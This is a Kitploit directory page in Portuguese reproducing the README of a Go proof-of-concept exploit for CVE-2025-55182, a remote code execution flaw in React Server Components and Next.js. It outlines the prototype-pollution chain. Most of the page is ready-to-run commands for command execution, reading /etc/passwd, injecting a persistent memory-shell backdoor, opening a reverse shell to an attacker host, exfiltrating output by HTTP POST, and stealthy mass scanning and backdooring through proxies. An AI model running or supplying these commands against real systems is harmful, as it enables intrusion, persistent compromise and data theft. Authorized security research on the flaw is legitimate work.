Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-golang-PoC — Prova de conceito baseada em Go para CVE-2025-55182, um RCE crítico no React Server Components. Inclui verificação de vulnerabilidade, execução de comandos, injeção de shell na memória, shell reverso, escaneamento em lote e suporte a proxy para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPós-ExploraçãoTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

Prova de conceito baseada em Go para CVE-2025-55182, um RCE crítico no React Server Components. Inclui verificação de vulnerabilidade, execução de comandos, injeção de shell na memória, shell reverso, escaneamento em lote e suporte a proxy para testes de segurança autorizados.

Ver RepositórioSite
619há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 React Server Components RCE - PoC em Go

⚠️ APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS ⚠️

Descrição

CVE-2025-55182 (também conhecida como CVE-2025-66478) é uma vulnerabilidade crítica de Execução Remota de Código em React Server Components (protocolo Flight). Esta ferramenta é uma implementação em Go do PoC para pesquisa de segurança e testes de penetração autorizados.

Versões afetadas:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x (antes dos patches: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7)
  • Next.js: 16.x (antes de 16.0.7)
  • Next.js: 14.3.0-canary.77 e versões canary posteriores

Detalhes da Vulnerabilidade

O exploit aproveita a poluição de protótipo na desserialização do protocolo Flight:

  1. Usa a desserialização $@ para obter uma referência a um Chunk
  2. Coloca Chunk.prototype.then como a propriedade then do objeto raiz
  3. Define status como RESOLVED_MODEL para chamar initializeModelChunk com um chunk falso controlado
  4. Aciona a desserialização de Blob que chama response._formData.get com o payload do atacante
  5. Define response._formData.get como o construtor Function para execução arbitrária de código

Funcionalidades

  • Capacidade RCE completa - Execute comandos arbitrários com saída
  • Modo de verificação de vulnerabilidade - Detecção segura sem exploração
  • Detecção de versão do Next.js - Identificação automática de versão
  • Injeção de Memory Shell - Backdoor persistente em /exec?cmd=
  • Varredura em lote - Varredura multi-thread com saída JSON
  • Suporte abrangente a proxies:
    • SOCKS5 com/sem autenticação
    • SOCKS4/SOCKS4a
    • Proxy HTTP/HTTPS com/sem autenticação
  • Modo furtivo - User-Agents de navegador, rastreador e segurança
  • Limitação de taxa - Atrasos configuráveis entre requisições
  • Reverse shell - mkfifo + nc (funciona no Alpine/busybox)
  • Exfiltração de dados - POST da saída do comando para servidor do atacante
  • Compilações multiplataforma - Mais de 30 combinações de SO/arquitetura
  • Saída JSON - Resultados legíveis por máquina para automação

Instalação

Binários Pré-compilados

Baixe a última versão para sua plataforma em GitHub Releases.

Binários disponíveis:

  • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
  • Windows: amd64, 386, arm64
  • macOS: amd64 (Intel), arm64 (Apple Silicon)
  • FreeBSD, OpenBSD, NetBSD: amd64, 386, arm, arm64
  • E mais...

A partir do código fonte

# Clonar repositório
git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
cd CVE-2025-55182-golang-PoC

# Compilar para a plataforma atual
go build -o cve-2025-55182 .

# Ou compilar para todas as plataformas
chmod +x build.sh
./build.sh

Compilar a partir do código fonte

Após executar ./build.sh, os binários estarão disponíveis no diretório build/ para todas as plataformas suportadas.

Uso

Comandos Básicos

# Verificar vulnerabilidade em um único alvo
./cve-2025-55182 -u http://target:3000 --check

# Detectar versão do Next.js
./cve-2025-55182 -u http://target:3000 --version-check

# Executar comando com saída
./cve-2025-55182 -u http://target:3000 -c "id"
./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"

Memory Shell (Backdoor Persistente)

# Injeta memory shell (verifica se já está instalado primeiro)
./cve-2025-55182 -u http://target:3000 --memshell

# Testa se o memory shell está ativo
./cve-2025-55182 -u http://target:3000 --test-shell

# Executa comando via memory shell
./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"

# Após a injeção, também é possível usar curl diretamente:
curl 'http://target:3000/exec?cmd=id'
curl 'http://target:3000/exec?cmd=whoami'

Cabeçalhos Personalizados e Bypass SSL

# Adicionar cabeçalhos personalizados (pode ser usado várias vezes)
./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'

# Ignorar verificação de certificado SSL (para certificados auto-assinados)
./cve-2025-55182 -u https://target:3000 --check -k
./cve-2025-55182 -u https://target:3000 --check --insecure

# Combinar com outras opções
./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080

Suporte a Proxy

# SOCKS5 com autenticação
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080

# SOCKS5 sem autenticação
./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080

# Proxy SOCKS4
./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080

# Proxy HTTP
./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080

Varredura em Lote

# Verificação em lote a partir de arquivo
./cve-2025-55182 --urls targets.txt --check

# Varredura em lote com saída JSON
./cve-2025-55182 --urls targets.txt --check --json -o results.json

# Varredura em lote com múltiplas threads e modo furtivo
./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s

# Salvar alvos vulneráveis em arquivo
./cve-2025-55182 -f targets.txt --check -o vulnerable.txt

# Injeção de memory shell em lote
./cve-2025-55182 --urls targets.txt --memshell --workers 10

# Execução de comando em lote
./cve-2025-55182 --urls targets.txt -c "id" --threads 5

Exfiltração de Rede

# Reverse shell (mkfifo + nc, funciona no Alpine)
./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444

# Iniciar ouvinte na máquina do atacante primeiro:
nc -lvnp 4444

# Exfiltrar saída do comando via HTTP POST
./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

# Iniciar ouvinte: nc -lvnp 4444

Opções

OpçãoDescrição
-u, --urlURL do alvo (ex.: http://localhost:3000)
-f, --fileArquivo contendo URLs de alvos (um por linha)
--urlsAlias para -f/--file
-o, --outputArquivo de saída para alvos vulneráveis
--jsonSaída dos resultados no formato JSON
-c, --commandComando a executar (com saída)
--checkVerificar vulnerabilidade
--version-checkDetectar versão do Next.js
--proxyURL do proxy (socks5://user:pass@ip:port, socks4://ip:port, http://ip:port)
-H, --headerCabeçalho personalizado (pode ser usado várias vezes)
-k, --insecureIgnorar verificação de certificado SSL/TLS
--stealthModo furtivo: browser, crawler, security (padrão: browser)
--delayAtraso entre requisições (ex.: 2s, 500ms)
--variantsUsar múltiplas variantes de payload para verificação completa
--memshellInjetar memory shell (backdoor persistente)
--test-shellTestar se o memory shell está ativo
--shell-execExecutar comando via memory shell
--revshell IP PORTAEstabelecer reverse shell
--exfil CMD IP PORTAExecutar comando e fazer POST da saída
-t, --timeoutTimeout da requisição em segundos (padrão: 15)
--threadsNúmero de threads concorrentes (padrão: 10)
--workersAlias para --threads
--nocolorDesabilitar saída colorida (para Windows/pipes)
-h, --helpMostrar mensagem de ajuda
-v, --versionMostrar versão

Tipos de Proxy

socks5://user:pass@ip:port  - SOCKS5 com autenticação
socks5://ip:port            - SOCKS5 sem autenticação  
socks5h://ip:port           - SOCKS5 com resolução DNS remota
socks4://ip:port            - Proxy SOCKS4
socks4a://ip:port           - Proxy SOCKS4a
http://user:pass@ip:port    - Proxy HTTP com autenticação
http://ip:port              - Proxy HTTP sem autenticação
https://ip:port             - Proxy HTTPS

Modos Furtivos

Baixar ferramenta